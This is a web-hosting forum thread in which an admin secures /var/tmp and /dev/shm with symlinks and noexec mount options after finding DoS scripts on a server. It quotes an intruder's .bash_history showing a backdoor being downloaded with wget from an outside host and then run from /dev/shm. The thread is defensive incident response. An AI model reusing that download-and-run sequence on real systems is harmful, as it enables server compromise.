I noticed /var/tmp is being used to put dos scripts.. /tmp has its own partition and is secure, but what can I do for /var/tmp?

Anyone who can point me to the right direction?

Thanks

Remove it and symlink it to /tmp

rm -fR /var/tmp
ln -s /tmp /var/tmp

Thanks Jim. I was thinking about using a symlink, but i was affraid it would still allow execution.

I''ve symlinked it now, thanks :)

Are there other tmp directories ?


Also, what does a bash log file do in a tmp dir?

-rw------- 1 nobody nobody 101 Jul 2 16:56 .bash_history

#cat .bash_history
cd /dev/shm
ls
rm cgi
wget http://doptik.100free.com/remap.zip
chmod 775 remap
./remap
rm remap
exit

I ran rkhunter and nothing found.

it means you had someone try to exploit your server with a backdoor.

cd /dev/shm

there might be some goodies there. also in your fstab find the /dev/shm line and change it from "defaults" to "rw,noexec,nosuid,nodev" and do mount -a.

Originally posted by thelinuxguy
it means you had someone try to exploit your server with a backdoor.

cd /dev/shm

there might be some goodies there. also in your fstab find the /dev/shm line and change it from "defaults" to "rw,noexec,nosuid,nodev" and do mount -a.

Thank you very much for your informative reply! (as always)

The strange thing is that I already checked it a few minutes after that the files were placed there, but couldnt find anything in there.

The fstab:

none /dev/shm tmpfs defaults 0 0
LABEL=/tmp /tmp ext3 defaults,noexec,nosuid,nodev 1 2

If I change the "defaults" to "rw,noexec,nosuid,nodev", should I also change the numbres 0 0 ? Is the /tmp ok with "defaults" in it?

i would use

"rw,noexec,nosuid,nodev"

for both of them, the numbers 0 0 are fine.

Originally posted by thelinuxguy
i would use

"rw,noexec,nosuid,nodev"

for both of them, the numbers 0 0 are fine.

Thank you! :gthumb:

Originally posted by Jim_UK
Remove it and symlink it to /tmp

rm -fR /var/tmp
ln -s /tmp /var/tmp

Be careful, some mail handling programs may expect /var/tmp to live in the same partition as /var - that is, you can create a file in /var/tmp and then atomically move it into place elsewhere in /var, preserving its inode and not having any window during which the file is partially written under the new name.

Kevin

Hello Everybody!
I found the information on this topic very usefull! But I have a doubt...

Instead of:

rm -fR /var/tmp
ln -s /tmp /var/tmp

Can I add this to the fstab ?

LABEL=/var/tmp /var/tmp ext3 defaults,noexec,nosuid,nodev 0 0

you would have to use bind,defaults,noexec,nosuid,nodev

Hey Steven! thanks for the reply!

I'm new to this fstab command... Why the need of "bind" ?

Can I just use "rw,noexec,nosuid,nodev" like they did on /tmp ?

Originally posted by ArlinOrlando
Hey Steven! thanks for the reply!

I'm new to this fstab command... Why the need of "bind" ?

Can I just use "rw,noexec,nosuid,nodev" like they did on /tmp ?

they probably have an actual /tmp partition. Somehow i doubt you will have a /var/tmp partition so you can just drop the LABEL= part

Don't forget to secure or remove /usr/local/apache/proxy as well.

Arlin,

You will need to look through to see what was exploited. That particular file you listed is a backdoor, it opens a port and allows a way into the server, being logged in as the user that httpd is operating under.

Source of that file ->
<< SNAP >>
DO NOT POST EXPLOIT CODES IN PUBLIC FORUMS

Lots of interesting things << SNAP >> , without going threw every single one and just looking at names, every single one of them should not effect a well setup server and are very well known.

Originally posted by bagfull
Don't forget to secure or remove /usr/local/apache/proxy as well.

So... should I add another line like:

usr/local/apache/proxy ext3 defaults,noexec,nosuid,nodev 0 0 ?

i usually delete the directory

OK! thanks Steven! :)

Originally posted by ArlinOrlando
So... should I add another line like:

usr/local/apache/proxy ext3 defaults,noexec,nosuid,nodev 0 0 ?

Yes just delete it!